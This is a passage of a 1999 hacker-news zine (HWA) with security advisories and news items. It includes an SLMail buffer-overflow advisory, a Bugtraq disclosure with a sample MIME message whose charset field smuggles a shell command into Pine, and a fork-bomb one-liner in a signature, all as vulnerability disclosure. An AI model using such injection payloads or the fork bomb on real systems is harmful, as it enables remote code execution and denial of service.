iQCVAwUBNsDNu7dzzzOFBFjJAQGpVgQApC+yMuvC1Nr7GprSaZl0mzMUQjz1iOba AzDYjksWY5iL+k/aDMuItJ9v/0TGSU7uQkxx64klQjqSmLRD3WZX51c4s9+VppFa V/Y4cf8h2woEenQM8wVwrg2S0rbOTFllnwB3UhT8LkhTC4Qeno8W8TEVTpQOwvhg lhPafl3ka/8= =Ub3k -----END PGP SIGNATURE----- 5.2 eEYe security advisories - Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ________________________________________________________________________ eEye Digital Security Team www.eEye.com info@eEye.com February 04, 1999 ________________________________________________________________________ Multiple SLMail Vulnerabilities Systems Affected SLMail 3.1 Release Date February 04, 1999 Advisory Code AD02041999 ________________________________________________________________________ Description: ________________________________________________________________________ We were once again grinding software through Retina Alpha code and have found the following. One of the ports that SLMail's POP Service listens on is port 27. It provides ESMTP functionality. The only difference between it and SLMail's SMTP service is that port 27 provides the "turn" functions. All vulnerabilities are based off of the port 27 service. The first vulnerability involves the "helo" command. There are two vulnerabilities within it. The first is sending "helo" followed by 819 to 849 characters. This will send the servers CPU to idle around 90%. The second vulnerability in the "helo" command is a buffer overflow. If you issue "helo" followed by 855 to 2041 characters the server will crash with your typical overflow error. The second set of vulnerabilities are with the "vrfy" and "expn" commands. We have not tested to find the start and stop string lengths but sending "vrfy" or "expn" with 2041 characters will cause the SLMail.exe to exit itself. So we can either send the CPU to 90%, overflow some buffers, or have the server exit without a trace. Take your pick. ________________________________________________________________________ Vendor Status ________________________________________________________________________ We gave SeattleLabs a week. We have no reply so far. Contact them directly and maybe they will respond. ________________________________________________________________________ Copyright (c) 1999 eEye Digital Security Team ________________________________________________________________________ Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. ________________________________________________________________________ Disclaimer: ________________________________________________________________________ The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com http://www.eEye.com Vendor response: Approved-By: Russ.Cooper@RC.ON.CA Date: Thu, 4 Feb 1999 23:58:24 GMT Reply-To: lt@seattlelab.com Sender: Windows NT BugTraq Mailing List From: Lee Thompson Subject: Multiple SLMail Vulnerabilities To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM We are working on a fix and will be including it in our SLmail 3.2 maintenance release. _ Lee Thompson                       lt@seattlelab.com Seattle Lab Inc.           http://www.seattlelab.com Product Manager @HWA 6.0 Arbitrary command execution in Pine in latest release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 8 Feb 1999 00:22:17 +0100 From: Michal Zalewski To: BUGTRAQ@netspace.org Subject: remote exploit on pine 4.10 - neverending story? Affected systems: ----------------- Any Un*x system running 'pine' up to version 4.10 (latest). Compromise: ----------- Remote execution of arbitrary code when message is viewed. Details: -------- About five months ago, I reported vunerability in metamail package used with pine. I also noticed that '`' character is incorrectly expanded by pine. Problem has been ignored (probably noone understood what I am talking about?;-). But no matter. An exception from /etc/mailcap: text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput Impact: ------- And now, ladies and gentelmen - my old bug, reinvented. Usually, above mailcap line is expanded to: [...] execve (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) Hmm, but take a look at this message: ************************** MIME MESSAGE FOLLOWS ************************** >From: Attacker To: Victim Subject: Happy birthday ... MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319" --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset='US-ASCII' Make a wish... --8323328-235065145-918425607=:319 Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c" Content-Transfer-Encoding: BASE64 Content-Description: wish Content-Disposition: attachment; filename="wish.c" ...it could be your last. *************************** MIME MESSAGE ENDS *************************** The result is: [...] execve (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1) ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is executed when message is viewed. Fix: ---- Well, it's the second time I report problems with ` in headers. Maybe pine developers should wait a little longer ;-) _______________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM] [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] 7.0 Hacking in Germany by Qubik ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking in Germany. ©1999 HWA/Qubik Though visiting Germany is a very common thing for myself, the trip I took last month was the first where I've actually looked into the Germany hacker scene.. The German press seem to support so much of the hacker ethic, the magazines and newspapers are full of interesting interviews, updates and facts. Rather than trying to cover up the fact that hacker exist, like so many others do, they embrace the fact and try to teach the country of what they do and why they do it. Take for example, CHIP, it's a computer magazine full of interesting news, not just pages and pages of adverts! One of the articles compares the new generation of hackers, against what is seen in films. It's full of information on the CCC, Karl Koch and an interesting interview with Christoph Fischer, who doesn't seem like an idiot reading a script..! This all leads to a strange, yet pleasing, affect, whereby both the hacker and your average Joe, get along without much tension, and from the impression I got from my associates, hackers in Germany are widely respected. But even in the heaven of Germany, hackerdom is looked down on upon by many, but at least there's a distinction between the good and bad hackers. Who knows, maybe one day I'll move to Germany and live in reasonable peace.. Links: http://www.chip.de/ http://www.ccc.de/ Have your say: qubik@bikkel.com cc: hwa@press.usmc.net 8.0 Spotlight on: Project Gamma ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Underground Sites - Project Gamma ©1999 HWA/Qubik In the first of a continuing series of reviews, I take a look into a group called Project Gamma. Who are they? What do they do? And why do they do it!? Despite consisting of a nice layout and some great content, Project Gamma has remained one of the more hidden underground sites. Having come from solid background as a division of Gamma Force, it's slowly grown into a widely respected resource.. It's current membership stands at a healthy five, with the webmaster, WHiTe VaMPiRe, working non-stop to keep everything working smoothly. The site includes some good news content, specifically targeted at the underground and some great extras such as the Top100 and webrings. I spoke to him and asked him what it was that compelled him to work as hard as he does, and like a seasoned spokesperson, he replied with an almost scripted answer.. "I'm just trying to make the most out of my time online." We all know the truth of being an admin of any site, is the attention we get from the opposite sex..! This site deserves more visitors, so if you've got to see one site today, why not make it this one!? Links: http://www.projectgamma.com/ http://www.gammaforce.org/ Have your say: qubik@bikkel.com cc: hwa@press.usmc.net @HWA 9.0 Secret Cyber Sex; Gary, your secret is out! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Via HNN Source: Nando Times, Kansas City Star Nando: http://www.techserver.com/story/0,1643,17514-28909-212134-0,00.html KCS: http://www.kcstar.com/item/pages/home.pat,local/30dabe6b.211,.html This is gawd knows how many times in recent weeks that a "misconfigured" search engine has spewed out data to netizens that was intended to be on secure servers or at least supposedly stored in confidence, this time Hallmark sucks the bullet for this boner: Hallmark computer glitch sends intimate online greetings into public cyberspace Copyright © 1999 Nando Media Copyright © 1999 Associated Press KANSAS CITY, Mo. (February 12, 1999 7:50 a.m. EST http://www.nandotimes.com) - The lovers and flirts sending e-mail Valentines and other notes on Hallmark Cards' online site no doubt intended their musings to be perused only by that special someone. Unwittingly, they had a potential audience of millions. A programming error at hallmark.com allowed anyone with a computer and some curiosity to search the Web site for private love notes - and, in many cases, the senders' name, home and e-mail addresses and place of employment. The security breach surprised customers and executives at the Kansas City-based company, which this week scrambled to modify the computer program after The Kansas City Star reported the problem. Technicians have since deleted all of the old messages. A Hallmark official said the problem involved only greetings sent a year or more ago. "It was a programming error," company spokeswoman Julie O'Dell said. "We certainly are committed to providing privacy." The recipient of a cyber Hallmark greeting card first gets an e-mail from the company, including a password. Then he or she clicks on a Web address to view the card. But until this week, all those messages were available to anyone who used the site's search engine, the newspaper reported. That means if the word "bear" was typed, for example, Hallmark's computer would have given you a list of Web pages including that word - including one page featuring a sweet message from "Teddy Bear" to his "Honey." "I had no idea," said Gary Harders of Chicago, who sent one of the cards to his wife. "I assumed it was private. "It defeats the whole purpose of sending somebody a personal card if everybody and his brother is going to get ahold of it. It could be embarrassing." O'Dell said she had no idea how many people might have clicked through the greetings. "This new system has, built in, a new standard to ensure this kind of thing doesn't happen again," she said. "We don't want a lot of people worried. None of the recent electronic greetings were in that file." According to the Star, some of the messages were obviously not meant for mass consumption. Among them: - "Gary & I have been having secret cyber sex via computer." - "I've seen you swing a sledge hammer and the way your muscles ripple ... is amazing." - "You deserve an extra foot massage tonight!" Another writer e-mailed an intimate message and a photo of a flower to a woman friend, trying to entice her into a romantic rendezvous. "You will have the greatest time you've had in 15 years," he assured his friend - unless the other man in her life persuaded her to stay home with him and their children instead. @HWA 10.0 Mr. Lewis, your kidney is out!, 'but but i'm DYIN over here' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Laugh ~~~~~ In a frightening real-life drama that played out over the net in front of approximately 3000 university BS laureates, Mr Donald Lewis 57 had his kidney removed by accident when a malicious cracker re-wrote his scheduled hemmorhoidal clippage to be performed for 'University Web TV' an outfit that doesn't really exist because this article is full of shit, had ya going there huh? well the scary truth follows: taken from Nando times: (via HNN) Don't laugh ~~~~~~~~~~~ Michigan medical records accidentally posted on Web for two months Copyright © 1999 Nando Media Copyright © 1999 Associated Press ANN ARBOR, Mich. (February 12, 1999 12:22 a.m. EST http://www.nandotimes.com) - Several thousand patient records at the University of Michigan Medical Center were available through public Internet sites for two months. "Luckily, we were notified and able to stop it this time before real damage was done," spokesman Dave Wilkins said. "Still, on all fronts, we're taking it very seriously." The problem was discovered Monday when a university student searching for information about a doctor on the medical center's Web site was linked to files containing private patient records. The records contained names, addresses, phone numbers, Social Security numbers, employment status, treatments for specific medical conditions and other data. The information was used to schedule appointments, Wilkins said. No one accessed the records until Monday, he said. "I'm certainly not happy about it," said Cary Johnson, a nurse at the medical center whose 2-year-old son's record was exposed. "I guess technology is helping us to do some things and hurting us in other ways." (Sounds like a real pain in the ass ... this reminds me of a time way back in the 80's when a local drugstore kindly donated an old Ohio Scientific multi-processor 6502 based machine with a 17" winchester drive in it, complete with medical records, to my computer collection, so much for privacy, guess we haven't come much further in regards to people's medical record privacy today. I mean sure I have an honest face but... maybe someday i'll put that box on the net, or perhaps it would make a great bar fridge or safe housing..hrm..but I digress. - Ed) @HWA 11.0 Free email account vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I've mentioned before that Hotmail and the like are not anonymous services and it should come as no surprise to anyone that they are also likely targets for crackers and are probably (I wouldn't know *g*) full of security holes. The biggest "hole" is that unlimited password attempts are allowed and anyone with a real determination to get in that knows anything at all about the target will probably succeed..eventually there are other vulnerabilities beyond the scope of this article that are not discussed and imho more frightening but basically if you want "secure" email ENCRYPT it, if you want anonymity, use nightmail or a remailer but that involves some work on your part. - Ed nightmail ( www.nightmail.com, pretty "anonymous" but full of pr0n banners etc) http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html Freemail Vulnerabilities If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to hackers. By Ira Winkler February 10, 1999 Free email services are a common feature on portal sites, but some of them have serious security vulnerabilities-- specifically, Yahoo! Mail, Excite Mail, and Hotmail. First, these three services allow an unlimited number of log-on attempts. This means that malicious Internet users can perform password guessing and "brute force" password attacks against accounts on those systems. (After three failed log-in attempts, Yahoo! does ask the supposed user if they require help. However, additional log-in attempts are not prevented.) Second, the user is not notified when a number of failed log-in attempts have occurred. If a password attack had been attempted against a user account, the user has no way of knowing. These vulnerabilities affect a lot of Internet surfers. Free email services are extremely popular as a Web-based alternative to regular Internet service provider accounts. The ability to access mail from any Web browser and a certain level of Internet anonymity are great advantages that these accounts offer. Security, however, is a distinct disadvantage. The problems probably are not limited to Yahoo!, Excite, and Hotmail. To test whether a particular site is vulnerable to a brute-force attack, simply try entering incorrect passwords. If the system allows more than ten invalid password entries without locking out the account, then it probably allows an unlimited number of password-cracking attempts. Password crackers attempt to obtain an account's password by exhaustively guessing word and number combinations. For example, an attacker may use a dictionary as the source of words. More sophisticated password crackers will use word-and-number combinations, such as star99. The most time-consuming technique is to try every possible combination of letters, numbers, and special characters. Such attacks can easily be automated. Password cracking is an extremely common hacker technique. To prevent brute-force attacks, a security function should lock an account after an excessive number of failed log-in attempts, typically three to five. Once an account is locked, the user should be emailed about the failed log-in attempts and told to contact the system administrators, who will verify the user's identity. While this would cause a temporary interruption of service, it would prevent the account from being compromised. This is a basic security practice that is built into most computer operating systems. Admittedly, these vulnerabilities are extremely basic. I was not expecting them to exist on all the systems I examined. I take their presence as an indication that security was not a crucial step in designing these systems. While the sites all state that users should choose their passwords well, they do not account for attacks that can compromise even the best passwords. This leaves users, who number in the thousands or even hundreds of thousands (industry numbers measure accounts, not the number of users), vulnerable to someone with even trivial programming and hacking skills. While no attacks have been reported, it is likely that they were attempted. It is also a given that they will be attempted and successful unless action is taken. I contacted Yahoo! and Excite press liaisons about this issue and received no official reply. Hotmail could not be reached by telephone, and email messages to its technical support groups were not returned. continued at the site ... http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html @HWA 12.0 Quebec poses hacker challenge to its open networks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Seen on HNN: contributed to HNN by Frenchie Montreal Gazette: http://www.montrealgazette.com/PAGES/990211/2266737.html Yahoo News- French Version : http://biz.yahoo.com/rf/990210/bjo.html QUEBEC WANTS CHALLENGERS TO TEST ITS COMPUTER SECURITY PAUL CHERRY The Gazette The provincial government is to enlist hackers to test the security of its information networks. A laboratory will be set up using the same computers - standard desktops with 400 megahertz Intel processors - used by many government services "as well as those used by hackers," Paul-Andre Comeau, president of the province's Access to Information Commission, said yesterday. The aim is inform people in charge of computers of recent innovations and of the relative advantages or disadvantages of new gadgets. "We will also be able to check out how safe the systems can be and how they can be improved," Comeau said. "In that respect, of course, we will have to be helped by outside people and, at times, like the RCMP does in Ottawa, by hackers who are converted." Comeau said reformed hackers are referred to as "white hackers" by the people who now hire them to protect systems. A 24-year-old former hacker, interviewed by The Gazette last week, now protects an international computer network based in Montreal. When he was 15, he was able to infiltrate Russian research computers - until he was caught and agreed to lecture RCMP staff on how hackers crack government systems to get information. Comeau said someone tried for hours to hack into the commission's network two years ago, on a Saturday afternoon. He said the demand for the extra protection has come not from the larger government ministries and organizations, but from smaller ones that are now trying to modernize and join established computer networks. Another objective of the laboratory is to advise government services on what types of equipment to buy. Even simple things like fax machines should be considered with security in mind, Comeau said. He said the committee is advising government services against sending personal information via faxes, except in exceptional circumstances and after taking precautionary steps. "We hope that in the coming year, we will be able to advise hospitals and social institutions to do their own evaluation of their systems," he said, adding that a lot of money is about to be invested in new information systems. The laboratory will also examine the safety of equipment used for sharing data among institutions like hospitals and municipal administrations, which keep information that falls under privacy laws. ©1998 The Gazette, a division of Southam Inc. @HWA 13.0 News from Tokyo ~~~~~~~~~~~~~~~ Contributed by Wile, source: Associated Press (c) 1999 AP TOKYO (AP) At a secret location somewhere in Tokyo, dozens    of specialists in cryptography and electronic media will soon be   hard at work patrolling cyberspace.    Due to open by July, the new headquarters for the National Police    Agency's ``cyber-cop'' squad signals growing concern about    computer security as more and more Japanese join the global    online revolution.    And while unauthorized computer snooping in Japan is less    common than in the United States, a sharp jump in    computer-related crimes in recent years has rattled authorities.    The increase is no surprise legally, Japan is a hacker's heaven.    Breaking into a computer system isn't even a crime in Japan,    which sets it apart from most other major industrialized nations.    Hackers are free to peep at sensitive data stored in Japanese    mainframes so long as they don't destroy or sell any of it.    ``We have fallen behind other countries in this area,'' said Kei    Hata, a member of Parliament who serves as deputy head of the    ruling party's Internet policy committee. ``It's a problem which    must be addressed quickly.''    Worry about the potential for computer-generated chaos has    prompted Tokyo to draft legislation to outlaw unauthorized    access. A bill is expected to be submitted in the current session of    Parliament, which ends in June.    The move comes amid pressure from Washington to bolster    international efforts to fight crime in cyberspace and dismay in    Japan over abuses such as the widespread transmission of child    pornography and even poison sales via suicide-related Websites.    The problem is still relatively new to Japan.    In 1997, the number of high-tech crimes known to Japanese police    climbed to 263, up from 178 the previous year and just 32 in    1993.    Still, a recent NPA survey showed that only 4 percent of    companies and colleges polled reported cases of unauthorized    access serious enough to inflict damage on their computer    systems.    By comparison, the San Francisco-based Computer Security    Institute and the FBI found that 64 percent of 520 U.S.    corporations, government agencies, financial institutions and    universities responding to a 1998 survey had at least one    computer security violation within the previous 12 months. More    than 70 percent suffered financial losses.    Japanese police suspect the true number of computer crimes is    much higher than the official figure, and note that many    businesses keep security problems under wraps to avoid negative    publicity.    Companies are particularly reluctant to disclose entanglements    with organized crime syndicates, known as the yakuza.    ``The yakuza have moved into this field,'' said Shunichi Kawabe,    an official in the NPA's information technology bureau. ``They are    very interested in making money in this type of business.''    He said Internet-brokered gun trafficking, Web page-based    pornography distribution and computer-generated financial fraud    are among the areas suspected of being targeted.   Thrill-seekers are also stirring up trouble.    One hacker broke into a computer network used by the Hokkaido    University of Education in northern Japan and gained access to    login IDs and passwords used by about 1,000 employees and    students. The university uncovered the security breach last    month and shut down the entire network.    Japan plans to step up computer training programs for police, but    authorities acknowledge they have a long way to go before    catching up with their counterparts in the United States.    The good news for the cops is that Japanese hackers also lag    behind their cohorts overseas.    ``Domestic cyber-criminals are still low-tech,'' said Kawabe. @HWA H.W Hacked websites ~~~~~~~~~~~~~~~ HNN: contributed by telephrk (via HNN http://www.hackernews.com/) Jordon Cracked This is presumably the first web site crack in the country of Jordan. http://www.go.com.jo A.0 APPENDICES ~~~~~~~~~~ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (r) Cruciphux is a trade mark of Harpies With Ailments corp. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- Hackerz Without Attitudez Information Warfare Alliance Website Opening soon: www.hwa-iwa.org --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]